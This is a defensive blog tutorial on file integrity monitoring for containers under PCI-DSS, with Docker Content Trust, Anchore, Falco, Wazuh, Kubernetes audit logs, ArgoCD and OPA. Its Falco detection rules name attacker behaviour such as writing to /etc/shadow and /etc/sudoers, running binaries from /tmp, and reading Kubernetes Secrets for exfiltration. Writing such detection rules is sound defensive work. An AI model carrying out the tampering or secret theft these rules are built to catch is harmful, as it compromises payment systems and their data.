A questions I hear often is: “How do we manage PCI Compliance for containers when they’re destroyed and recreated constantly?”
It’s a legitimate concern. In this post I write about file integrity monitoring when containerization is used (i.e. Docker, Kubernetes, etc) Traditional FIM tools were built for static servers that run for months or years. But containers? They live for minutes, hours, maybe days.
The PCI-DSS standard doesn’t give you a pass just because you’re using modern infrastructure. Requirement 11.5.2 still applies, you still need to detect unauthorized file modifications. The approach just looks completely different.
I’ve learned that success comes from understanding one key principle: In containerized environments, your “critical files” aren’t just files anymore, they’re images, runtime behavior, and Kubernetes configurations.
Let me show you how to build comprehensive file integrity monitoring for Docker and Kubernetes that actually works and passes PCI audits.
Why Traditional FIM Fails for Containers#
Before we dive into solutions, let’s understand why your existing FIM strategy breaks in containerized environments.
The fundamental problem: Containers are designed to be ephemeral and immutable. When you deploy a container, you’re not supposed to modify its files. If you need to change something, you build a new image and redeploy. This “immutable infrastructure” pattern is actually great for security, but it means traditional file monitoring doesn’t make sense.
Think about it: If you use a traditional FIM tool inside a container and it detects that /etc/nginx/nginx.conf changed, what does that tell you? In a VM, that might be unauthorized tampering. In a container, it could mean:
- Someone is violating immutable infrastructure principles (bad)
- The application legitimately writes to that path (maybe okay)
- The container is under attack (definitely bad)
- Or it’s just normal container startup behavior (totally fine)
You need context that traditional FIM can’t provide.
Additional challenges:
- Scale: You might have 500 containers across 100 nodes. Traditional per-host FIM doesn’t scale.
- Layered filesystems: Container images are built in layers. Which layer changed? Was it in the base image or added at runtime?
- Shared resources: Multiple containers sharing the same underlying host make attribution difficult.
The solution is a three-layer approach that monitors the entire container lifecycle: build time, runtime, and orchestration.
The Three-Layer Container FIM Strategy#
I’ve found that successful container FIM requires monitoring at three distinct layers, each serving a different purpose:
Layer 1: Container Images (Build-Time Integrity) This is where you ensure that only authorized, verified images run in your environment. Think of this as “preventive FIM”, stopping bad images before they ever start.
Layer 2: Runtime File Changes (Drift Detection) Once containers are running, you monitor for unexpected file modifications, process executions, and behavior that deviates from the image definition. This is “detective FIM” for active containers.
Layer 3: Kubernetes Configuration (Control Plane Monitoring) Your Kubernetes configs, deployments, secrets, network policies, RBAC,are just as critical as files on disk. Changes here can be just as damaging as modified binaries.
Let’s explore each layer in detail.
Layer 1: Container Image Integrity#
The first line of defense is ensuring that container images themselves haven’t been tampered with. If you can guarantee that only signed, verified images run in your environment, you’ve already prevented a huge category of attacks.
Image Signing and Verification#
Docker Content Trust is the standard way to cryptographically sign container images. When enabled, Docker won’t pull or run unsigned images,it’s like code signing for containers.
Here’s how it works in practice. When you enable Docker Content Trust, every image push requires a signature:
# Enable Docker Content Trust globally
export DOCKER_CONTENT_TRUST=1
# Now when you push an image, Docker automatically signs it
docker trust sign myregistry.com/payment-app:v1.0
# When pulling, verification happens automatically
docker pull myregistry.com/payment-app:v1.0
# This will fail if the signature is invalid or missingThe beauty of this approach is that it’s transparent once configured. Developers can’t accidentally (or maliciously) push unsigned images. QSAs love this because it provides cryptographic proof that images haven’t been modified since they were built and signed by your CI/CD pipeline.
For your PCI audit: Show the assessor that Docker Content Trust is enabled on all production systems and demonstrate that unsigned images are rejected. Keep logs of signature verification,these serve as your FIM evidence for the image layer.
Immutable Image References#
Another critical practice is deploying containers using their cryptographic digest (SHA256 hash) rather than tags. Tags like v1.0 or latest are mutable, someone could push a new image with the same tag. But a digest is immutable; it’s a hash of the exact image contents.
When you deploy using a digest, you’re guaranteed to get the exact same bits every time:
# Get the digest of an image
docker images --digests
# Deploy using the digest (notice the @sha256: syntax)
docker pull myregistry.com/payment-app@sha256:abc123def456...In Kubernetes, this looks like:
apiVersion: apps/v1
kind: Deployment
metadata:
name: payment-app
spec:
template:
spec:
containers:
- name: app
# Pin by digest - this exact image version, forever
image: myregistry.com/payment-app@sha256:abc123def456...This might seem overly paranoid, but I’ve seen incidents where attackers compromised a container registry and pushed malicious images with the same tag as legitimate ones. If you’re deploying by tag, you’ll pull the malicious image. If you’re deploying by digest, you’re protected.
Automated Image Scanning with Anchore#
While signing and digest pinning prevent tampering, you also need to understand what’s actually in your images. Anchore Engine is an open-source tool that analyzes container images and can detect changes between versions.
After installing Anchore (which runs as a set of containers itself), you can scan images as they’re built:
# Install Anchore using Docker Compose
docker-compose -f docker-compose-anchore.yaml up -d
# Add an image for analysis
anchore-cli image add myregistry.com/payment-app:latest
# Wait for the analysis to complete
anchore-cli image wait myregistry.com/payment-app:latest
# Get a complete list of files in the image
anchore-cli image content myregistry.com/payment-app:latest files
# Compare two versions to see what changed
anchore-cli image diff myregistry.com/payment-app:v1.0 myregistry.com/payment-app:v1.1That last command is incredibly powerful for FIM purposes. It shows you exactly what files were added, modified, or deleted between image versions. During a PCI audit, you can demonstrate that you have automated detection of image changes and a process for reviewing them.
You can even create policies that enforce specific file integrity requirements. For example, here’s an Anchore policy that alerts if /etc/passwd is modified in an image:
{
"id": "pci_fim_policy",
"name": "PCI-DSS File Integrity Policy",
"version": "1.0",
"rules": [
{
"action": "STOP",
"gate": "files",
"trigger": "content_regex_match",
"params": [
{
"name": "path",
"value": "/etc/passwd"
},
{
"name": "check",
"value": ".*"
}
]
},
{
"action": "WARN",
"gate": "files",
"trigger": "suid_or_sgid_set",
"params": []
}
]
}Layer 2: Runtime Container Monitoring#
Once containers are running, you need visibility into their behavior. This is where runtime security tools come in,they monitor container activity and alert when something deviates from expected behavior.
Falco: The Gold Standard for Container Runtime Security#
Falco is an open-source runtime security tool originally created by Sysdig and now a CNCF project. Think of it as an intrusion detection system specifically designed for containers and Kubernetes.
Falco works by tapping into the Linux kernel (via eBPF or kernel module) and monitoring system calls. It knows when processes start, when files are opened, when network connections are made,everything happening in your containers.
The installation is straightforward, especially on Kubernetes:
# Add the Falco Helm repository
helm repo add falcosecurity https://falcosecurity.github.io/charts
# Install Falco as a DaemonSet (runs on every node)
helm install falco falcosecurity/falco \
--namespace falco \
--create-namespaceOnce installed, Falco continuously monitors container activity. But the real power comes from the rules you configure. Here’s a rule that detects writes to sensitive files inside containers:
# Detect writes to critical files in containers
- rule: Write to sensitive file in container
desc: Detect writes to critical files (PCI-DSS 11.5.2)
condition: >
container and
open_write and
(fd.name in (/etc/passwd, /etc/shadow, /etc/sudoers) or
fd.name startswith /app/config/ or
fd.name startswith /opt/payment-app/)
output: >
Critical file write in container
(user=%user.name container=%container.name
file=%fd.name command=%proc.cmdline)
priority: CRITICAL
tags: [pci_dss_11.5.2, filesystem, container]Let me break down what this rule does. It triggers when:
- The event happens inside a container (
container) - A file is opened for writing (
open_write) - The file path matches sensitive locations (system files or application configs)
When triggered, Falco outputs detailed context: who made the change, which container, what file, and what command caused it. This is exactly the kind of evidence QSAs want to see for file integrity monitoring.
Here are a few more practical Falco rules for PCI compliance:
Detect package manager execution in running containers:
- rule: Package management in container
desc: Package manager run after container start (drift detection)
condition: >
container and
spawned_process and
package_mgmt_procs and
container_started
output: >
Package manager run in running container
(user=%user.name container=%container.name
command=%proc.cmdline)
priority: ERROR
tags: [pci_dss_11.5.2, package_management]Why does this matter? In immutable infrastructure, you should never run apt-get install or yum install in a running container. If you need to install something, you rebuild the image. If Falco sees package manager activity, it means someone is violating immutability,or worse, an attacker is installing tools.
Detect binary execution from temporary directories:
- rule: Binary executed from tmp
desc: Unauthorized binary in /tmp (potential compromise)
condition: >
container and
spawned_process and
proc.pname != null and
fd.name startswith /tmp and
proc.is_exe_writable=true
output: >
Binary executed from /tmp in container
(user=%user.name container=%container.name
command=%proc.cmdline file=%fd.name)
priority: WARNING
tags: [pci_dss_11.5.2, execution]/tmp because it’s usually writable. This rule catches that behavior.Monitor configuration file modifications:
- rule: Configuration file modified
desc: Application config changed at runtime
condition: >
container and
open_write and
(fd.name startswith /etc/nginx/ or
fd.name startswith /etc/mysql/ or
fd.name startswith /app/config/)
output: >
Configuration file modified in container
(user=%user.name container=%container.name
file=%fd.name command=%proc.cmdline)
priority: WARNING
tags: [pci_dss_11.5.2, configuration]This catches runtime modifications to application configs. In a properly designed container, configs should be read-only or injected via ConfigMaps,not modified at runtime.
The final piece is forwarding Falco alerts to your SIEM. Configure Falco to output JSON and send it to Splunk, Elasticsearch, or wherever you aggregate security events:
# Enable JSON output
json_output: true
json_include_output_property: true
# Send to Splunk HTTP Event Collector
http_output:
enabled: true
url: "https://splunk.company.com:8088/services/collector"
# Or send to Slack for real-time notifications
program_output:
enabled: true
program: "jq '{text: .output}' | curl -X POST -H 'Content-type: application/json' --data @- https://hooks.slack.com/services/YOUR/WEBHOOK/URL"Now you have real-time alerting on container file changes with full context about what happened, who did it, and which container was affected.
Alternative: Wazuh Sidecar Pattern#
If you’re already using Wazuh for traditional FIM on VMs, you can extend it to containers using the sidecar pattern. A sidecar is an additional container that runs alongside your application container in the same pod.
Here’s how you’d deploy a Wazuh agent as a sidecar:
apiVersion: apps/v1
kind: Deployment
metadata:
name: payment-app
spec:
template:
spec:
containers:
# Main application container
- name: payment-app
image: myregistry.com/payment-app:v1.0
volumeMounts:
- name: app-data
mountPath: /app/data
- name: app-config
mountPath: /app/config
# Wazuh FIM sidecar container
- name: wazuh-agent
image: wazuh/wazuh-agent:latest
env:
- name: WAZUH_MANAGER
value: "wazuh-manager.security.svc.cluster.local"
volumeMounts:
# Mount the same volumes to monitor them
- name: app-data
mountPath: /shared/app/data
readOnly: true
- name: app-config
mountPath: /shared/app/config
readOnly: true
- name: wazuh-config
mountPath: /var/ossec/etc/ossec.conf
subPath: ossec.conf
volumes:
- name: app-data
emptyDir: {}
- name: app-config
configMap:
name: app-config
- name: wazuh-config
configMap:
name: wazuh-container-configThe Wazuh sidecar can access the same volumes as your application and monitor them for changes. Configure it to watch your critical files:
<!-- Wazuh configuration for containers -->
<syscheck>
<frequency>3600</frequency>
<alert_new_files>yes</alert_new_files>
<!-- Monitor shared volumes -->
<directories check_all="yes" realtime="yes">/shared/app/config</directories>
<directories check_all="yes" realtime="yes">/shared/app/data</directories>
<!-- Container-specific paths -->
<directories check_all="yes">/etc/nginx</directories>
<directories check_all="yes">/etc/mysql</directories>
</syscheck>The sidecar approach works well if you’re already invested in Wazuh. The downside is that it adds overhead (an extra container per pod) and only monitors shared volumes, not the entire container filesystem.
Layer 3: Kubernetes Configuration Monitoring#
This is the layer most organizations miss entirely, and it’s a huge gap in their PCI compliance.
When you deploy on Kubernetes, your “critical configuration files” aren’t just /etc/nginx/nginx.conf anymore. They’re Kubernetes manifests: Deployments, Services, ConfigMaps, Secrets, NetworkPolicies, RBAC rules. Changes to these objects can be just as impactful as file modifications on a server.
Imagine someone modifies a NetworkPolicy to allow unrestricted egress traffic from your payment processing pods. Or they change a Secret to inject malicious credentials. Or they add a ClusterRole that gives a service account cluster-admin privileges. Traditional file integrity monitoring won’t catch any of this.
Kubernetes Audit Logs: Your Control Plane FIM#
Kubernetes has a built-in audit logging system that records every API request. When someone creates, updates, or deletes a resource, it’s logged. This is your equivalent of file integrity monitoring for Kubernetes objects.
First, you need to enable audit logging by creating an audit policy. This defines what events get logged and at what detail level:
# /etc/kubernetes/audit-policy.yaml
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
# Log all changes to ConfigMaps and Secrets
- level: RequestResponse
verbs: ["create", "update", "patch", "delete"]
resources:
- group: ""
resources: ["configmaps", "secrets"]
# Log all changes to Deployments
- level: RequestResponse
verbs: ["create", "update", "patch", "delete"]
resources:
- group: "apps"
resources: ["deployments", "statefulsets", "daemonsets"]
# Log all RBAC changes (critical for access control)
- level: RequestResponse
verbs: ["create", "update", "patch", "delete"]
resources:
- group: "rbac.authorization.k8s.io"
resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
# Log NetworkPolicy changes
- level: RequestResponse
verbs: ["create", "update", "patch", "delete"]
resources:
- group: "networking.k8s.io"
resources: ["networkpolicies"]Let me explain the key parts:
level: RequestResponsemeans log both the request (what change was requested) and the response (what actually happened)verbs: ["create", "update", "patch", "delete"]captures all modification operationsresourcesspecifies which Kubernetes object types to monitor
Once you’ve created the policy, configure the Kubernetes API server to use it:
# Add these flags to kube-apiserver
spec:
containers:
- command:
- kube-apiserver
- --audit-policy-file=/etc/kubernetes/audit-policy.yaml
- --audit-log-path=/var/log/kubernetes/audit.log
- --audit-log-maxage=30 # Keep 30 days of logs
- --audit-log-maxbackup=10 # Keep 10 backup files
- --audit-log-maxsize=100 # Max 100MB per fileNow every change to your Kubernetes resources is logged. Here’s what an audit log entry looks like when someone modifies a ConfigMap:
{
"kind": "Event",
"apiVersion": "audit.k8s.io/v1",
"level": "RequestResponse",
"auditID": "abc-123-def-456",
"stage": "ResponseComplete",
"requestURI": "/api/v1/namespaces/payment-namespace/configmaps/app-config",
"verb": "patch",
"user": {
"username": "john@company.com",
"groups": ["system:authenticated"]
},
"sourceIPs": ["10.0.1.50"],
"userAgent": "kubectl/v1.28.0",
"objectRef": {
"resource": "configmaps",
"namespace": "payment-namespace",
"name": "app-config"
},
"responseStatus": {
"code": 200
},
"requestObject": {
"data": {
"database_url": "postgresql://newhost:5432/db"
}
},
"responseObject": {
"data": {
"database_url": "postgresql://newhost:5432/db"
}
}
}This gives you everything: who made the change, what they changed, when they changed it, and what the new value is. For PCI compliance, this is gold,complete traceability of configuration changes.
Forward these audit logs to your SIEM for centralized monitoring and alerting.
Falco for Kubernetes Configuration Changes#
Falco can also monitor Kubernetes API activity in real-time. While audit logs provide a complete record, Falco gives you immediate alerts on suspicious changes.
Here are some Falco rules specifically for Kubernetes FIM:
# Alert when ConfigMaps are modified
- rule: ConfigMap Modified
desc: ConfigMap changed (potential config drift)
condition: >
kevt and
ka.verb in (create, update, patch) and
ka.target.resource=configmaps and
ka.target.namespace in (payment-namespace, cde-namespace)
output: >
ConfigMap modified
(user=%ka.user.name namespace=%ka.target.namespace
configmap=%ka.target.name verb=%ka.verb)
priority: WARNING
tags: [k8s, pci_dss_11.5.2]This rule fires whenever someone creates or updates a ConfigMap in your payment processing namespaces. You get real-time Slack or email notifications.
Alert on Secret access:
- rule: Secret Read
desc: Secret accessed (monitoring for data exfiltration)
condition: >
kevt and
ka.verb=get and
ka.target.resource=secrets
output: >
Secret accessed
(user=%ka.user.name namespace=%ka.target.namespace
secret=%ka.target.name)
priority: INFO
tags: [k8s, secrets]Detect overly permissive RBAC:
- rule: ClusterRole with Wildcard Created
desc: Overly permissive RBAC created
condition: >
kevt and
ka.verb=create and
ka.target.resource=clusterroles and
ka.req.clusterrole.rules.resources contains "*"
output: >
Dangerous ClusterRole created with wildcard permissions
(user=%ka.user.name clusterrole=%ka.target.name)
priority: CRITICAL
tags: [k8s, rbac, pci_dss_7.2]ClusterRoles with wildcard permissions (resources: ["*"]) grant access to everything. This rule catches when someone creates such a role, which is often a sign of privilege escalation.
GitOps: Infrastructure-as-Code FIM#
The most elegant solution for Kubernetes configuration integrity is GitOps. With tools like ArgoCD or FluxCD, you declare all your Kubernetes resources in a Git repository, and the GitOps controller ensures the cluster state matches what’s in Git.
Here’s why this is powerful for FIM: Git becomes your single source of truth. Any change to Kubernetes resources must go through a Git commit, which gives you:
- Complete audit trail: Git history shows who changed what, when, and why
- Code review: Pull requests ensure changes are reviewed before deployment
- Drift detection: If someone makes a manual
kubectlchange, ArgoCD detects it as “drift” - Automatic remediation: ArgoCD can auto-sync, reverting unauthorized changes
Your Git repository might look like:
payment-app/
├── base/
│ ├── deployment.yaml
│ ├── service.yaml
│ ├── configmap.yaml
│ └── secret.yaml (encrypted with sealed-secrets)
└── overlays/
└── production/
└── kustomization.yamlArgoCD continuously monitors this repository. If someone commits a change to deployment.yaml, ArgoCD deploys it. If someone makes a manual change directly to the cluster, ArgoCD detects drift:
# Check for drift (cluster state vs. Git)
argocd app diff payment-app
# Enable auto-sync to enforce Git as source of truth
argocd app set payment-app --sync-policy automated --self-healWith auto-sync enabled, ArgoCD reverts any manual changes back to what’s defined in Git. This is FIM with automatic remediation built-in.
For PCI compliance, you can show assessors:
- Git commit history as your audit trail of configuration changes
- ArgoCD logs showing drift detection and auto-remediation
- Pull request records demonstrating change approval workflow
Set up webhooks to alert on Git commits:
# GitHub webhook → Slack on commit to production configs
curl -X POST https://hooks.slack.com/services/YOUR/WEBHOOK \
-d '{
"text": "K8s Config Changed",
"attachments": [{
"title": "Commit: Payment App Deployment",
"text": "User: john@company.com\nFile: deployment.yaml\nChange: Image updated to v1.2.3"
}]
}'Now every configuration change generates a Slack notification in real-time.
Open Policy Agent: Preventive Configuration Control#
While the previous approaches detect unauthorized changes, Open Policy Agent (OPA) prevents them from happening in the first place. OPA acts as an admission controller,it intercepts Kubernetes API requests and can reject them based on policy.
For example, you can create a policy that requires all images to use digest references:
# opa-policy.rego
package kubernetes.admission
# Deny if image doesn't use digest
deny[msg] {
input.request.kind.kind == "Pod"
image := input.request.object.spec.containers[_].image
not contains(image, "@sha256:")
msg := sprintf("Image must use digest: %v", [image])
}When someone tries to deploy a pod with image: myapp:latest, OPA rejects it. They must use image: myapp@sha256:abc123... instead. This enforces immutable image references at the admission layer.
Other useful OPA policies for PCI:
Prevent privileged containers:
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.containers[_].securityContext.privileged == true
msg := "Privileged containers not allowed in CDE"
}Require resource limits:
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.resources.limits
msg := sprintf("Container %v missing resource limits", [container.name])
}Deploy OPA using Gatekeeper (OPA’s Kubernetes-native implementation):
# Install Gatekeeper
kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/deploy/gatekeeper.yaml
# Apply your policies
kubectl apply -f opa-constraint-template.yaml
kubectl apply -f opa-constraint.yamlOPA provides preventive control,bad configurations never make it into the cluster. Combined with audit logs and Falco for detective control, you have defense in depth.
The Complete Architecture#
Let me tie this all together. Here’s what a complete container FIM architecture looks like:
┌──────────────────────────────────────────────────────────────┐
│ LAYER 1: Image Build Time │
│ ┌─────────────┐ ┌───────────────┐ ┌────────────────┐ │
│ │ Anchore │ │ Docker Content│ │ Notary Server │ │
│ │ Engine │ │ Trust │ │ (Signatures) │ │
│ └─────────────┘ └───────────────┘ └────────────────┘ │
│ │
│ Purpose: Ensure only signed, scanned images reach prod │
└──────────────────────────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────┐
│ LAYER 2: Container Runtime │
│ ┌─────────────┐ ┌──────────────┐ ┌────────────────┐ │
│ │ Falco │ │ Sysdig │ │ Wazuh Sidecar │ │
│ │ (Runtime) │ │ Secure │ │ FIM │ │
│ └─────────────┘ └──────────────┘ └────────────────┘ │
│ │
│ Purpose: Detect file changes and anomalous behavior │
└──────────────────────────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────┐
│ LAYER 3: Kubernetes Control Plane │
│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │
│ │ K8s Audit │ │ Falco (K8s) │ │ ArgoCD (GitOps │ │
│ │ Logs │ │ Rules │ │ Drift Detect) │ │
│ └─────────────┘ └──────────────┘ └─────────────────┘ │
│ │
│ Purpose: Monitor infrastructure configuration changes │
└──────────────────────────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────┐
│ SIEM Integration (Splunk / ELK / Sentinel) │
│ │
│ Centralized alerting, correlation, and compliance reporting │
└──────────────────────────────────────────────────────────────┘Each layer serves a specific purpose:
- Layer 1 prevents compromised images from entering your environment
- Layer 2 detects runtime tampering and anomalous behavior
- Layer 3 catches infrastructure configuration changes
Together, they provide comprehensive file integrity monitoring that actually works in containerized environments.
What Your QSA Needs to See#
When your PCI assessor shows up, they’ll ask for evidence that you’re monitoring critical files. Here’s what you should have ready:
Evidence Package Structure#
Container-FIM-Evidence/
├── 1-Image-Integrity/
│ ├── docker-content-trust-enabled.txt
│ ├── image-digests-list.txt
│ ├── anchore-scan-results.json
│ ├── notary-signatures.txt
│ └── registry-access-logs.txt
│
├── 2-Runtime-Monitoring/
│ ├── falco-rules.yaml
│ ├── falco-alerts-sample.json
│ ├── wazuh-sidecar-config.xml
│ └── sysdig-policy-screenshot.png
│
├── 3-Kubernetes-Config/
│ ├── k8s-audit-policy.yaml
│ ├── k8s-audit-log-sample.json
│ ├── argocd-drift-detection.txt
│ ├── opa-policies.rego
│ └── git-commit-history.txt
│
├── 4-Alert-Evidence/
│ ├── sample-falco-alert-email.eml
│ ├── splunk-correlation-rule.spl
│ ├── slack-webhook-config.txt
│ └── servicenow-ticket-INC123456.pdf
│
└── 5-Review-Process/
├── weekly-fim-review-notes-Q1-2026.pdf
├── incident-response-playbook.pdf
└── change-management-approvals.xlsxWhat each section demonstrates:
1. Image Integrity: Proves you verify image authenticity before deployment
- Show that Docker Content Trust is enabled globally
- Provide a list of production images with their SHA256 digests
- Include Anchore scan results showing no unexpected file modifications
- Document image signing workflow
2. Runtime Monitoring: Proves you detect file changes in running containers
- Provide Falco rules configured for your environment
- Include sample alerts showing the system works
- Show SIEM integration (how alerts are routed)
3. Kubernetes Config: Proves you monitor infrastructure changes
- Show audit policy configuration
- Provide sample audit log entries for ConfigMap/Secret/Deployment changes
- Demonstrate GitOps drift detection
- Show OPA policies preventing unauthorized configurations
4. Alert Evidence: Proves alerts actually reach someone who acts on them
- Sample email alerts from Falco
- Slack notifications
- SIEM correlation rules
- ServiceNow tickets showing investigation of alerts
5. Review Process: Proves someone reviews and acts on FIM data
- Weekly review meeting notes
- Incident response procedures
- Examples of approved changes (with change tickets)
- Examples of detected unauthorized changes (with investigation records)
The assessor will want to see not just that you have the tools, but that you’re actually using them. The review process documentation is critical, it shows that FIM isn’t just checkbox compliance, but an active part of your security operations.
Best Practices Summary#
Here’s what separates successful deployments from those that fail audits:
DO:
- ✅ Use image digests everywhere. Tag names are mutable; digests aren’t. Pin production deployments to specific SHA256 hashes.
- ✅ Sign all production images. Enable Docker Content Trust and make unsigned images undeployable.
- ✅ Deploy Falco with custom rules. The default rules are good, but tailor them to your specific applications and compliance requirements.
- ✅ Enable Kubernetes audit logs. This is non-negotiable for PCI compliance. Without audit logs, you have no record of infrastructure changes.
- ✅ Use GitOps for all configurations. Make Git the single source of truth. Manual
kubectlcommands should be exceptional, not routine. - ✅ Alert on container drift. If files change at runtime, something’s wrong. Containers should be immutable.
- ✅ Monitor RBAC changes religiously. Privilege escalation often happens through RBAC modifications.
- ✅ Document everything. Your future self (and your auditor) will thank you.
DON’T:
- ❌ Use
:latesttags in production. It’s the container equivalent ofSELECT * FROM passwords WHERE 1=1. Just don’t. - ❌ Allow privilege escalation in containers. If a container needs root, you’ve probably designed it wrong.
- ❌ Skip image scanning. Anchore or equivalent should be mandatory in your CI/CD pipeline.
- ❌ Ignore runtime file writes. In immutable infrastructure, file writes at runtime are anomalies worth investigating.
- ❌ Make manual kubectl changes. Use GitOps. Manual changes bypass your audit trail.
- ❌ Run containers as root. Use USER directive in Dockerfiles to run as non-root. PCI assessors will check this.
- ❌ Forget to test your alerts. Periodically trigger a Falco rule intentionally to verify alerts reach the right people.
Quick Start: Getting FIM Running Today#
If you want to get basic container FIM running quickly, here’s a script that sets up the essentials:
#!/bin/bash
# quick-container-fim-setup.sh
echo "[*] Setting up container FIM..."
# 1. Install Falco for runtime monitoring
echo "[*] Installing Falco..."
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco \
--namespace falco \
--create-namespace \
--set falco.jsonOutput=true
# 2. Enable Kubernetes Audit Logs
echo "[*] Configuring K8s audit policy..."
kubectl apply -f k8s-audit-policy.yaml
# 3. Install ArgoCD for GitOps
echo "[*] Installing ArgoCD..."
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml
# 4. Enable Docker Content Trust globally
echo "[*] Enabling Docker Content Trust..."
export DOCKER_CONTENT_TRUST=1
echo 'export DOCKER_CONTENT_TRUST=1' >> ~/.bashrc
echo ""
echo "[+] Container FIM setup complete!"
echo ""
echo "Next steps:"
echo " 1. Configure Falco rules for your applications"
echo " 2. Set up image signing workflow in CI/CD"
echo " 3. Configure audit log forwarding to SIEM"
echo " 4. Create Git repository for K8s manifests"
echo " 5. Test alert delivery (Slack/email/ServiceNow)"
echo ""
echo "Documentation: https://cybersecpro.me/blog/docker-kubernetes-fim/"This gives you the foundation. From here, customize Falco rules, set up SIEM forwarding, and integrate with your existing security stack.
Final Thoughts#
Container FIM is fundamentally different from traditional file integrity monitoring, but the underlying goal is the same: detect unauthorized changes before they cause damage.
The key insight is understanding that in containerized environments, “files” exist at multiple layers:
- Images (build time)
- Running container filesystems (runtime)
- Kubernetes manifests (control plane)
Traditional FIM only covers the middle layer, and often does it poorly. A comprehensive approach monitors all three.
The good news? Container platforms give you better visibility than traditional infrastructure ever did. Every API call is logged. Every system call can be monitored. Every deployment goes through version control. You just need to wire it up correctly.
Start with the basics: image signing, Falco, and audit logs. Build from there. Within a few weeks, you’ll have FIM coverage that’s not just compliant, but actually useful for detecting and responding to threats.
And when your QSA asks, “How do you monitor file integrity in your containerized CDE?",you’ll have a great answer.
Thoughts or corrections? Hit me up on LinkedIn or e-mail.
Related Posts:
